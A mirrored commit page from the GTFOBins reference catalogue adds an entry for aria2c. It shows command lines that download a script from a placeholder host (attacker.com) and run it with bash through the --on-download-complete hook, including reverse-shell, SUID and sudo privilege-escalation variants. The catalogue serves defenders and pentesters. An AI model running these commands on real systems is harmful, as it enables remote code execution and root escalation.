mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add aria2c
Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit
This commit is contained in:
parent
8eaf595fe6
commit
214f7786c0
13
_gtfobins/aria2c.md
Normal file
13
_gtfobins/aria2c.md
Normal file
@ -0,0 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- description: "By default the ``--on-download-complete`` option execute a given binary with 3 parameters: https://aria2.github.io/manual/en/html/aria2c.html?highlight=download%20complete#event-hook We can control the first one (GID) which leads to a command execution"
|
||||
- code: "aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa # aaaaaaaaaaaaaaaa file contains a shell script"
|
||||
reverse-shell-interactive:
|
||||
- description: Run ``nc -lvp 12345`` on the attacker box to receive the shell.
|
||||
- code: "aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa # aaaaaaaaaaaaaaaa file contains the reverse shell payload (in bash)"
|
||||
suid-enabled:
|
||||
- code: "./aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa"
|
||||
sudo-enabled:
|
||||
- code: "sudo aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa"
|
||||
---
|
Loading…
Reference in New Issue
Block a user